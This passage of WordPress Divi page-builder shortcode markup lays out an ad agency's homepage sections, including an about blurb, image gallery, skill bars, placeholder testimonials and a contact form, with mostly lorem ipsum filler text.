us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency.An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span><br /><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" 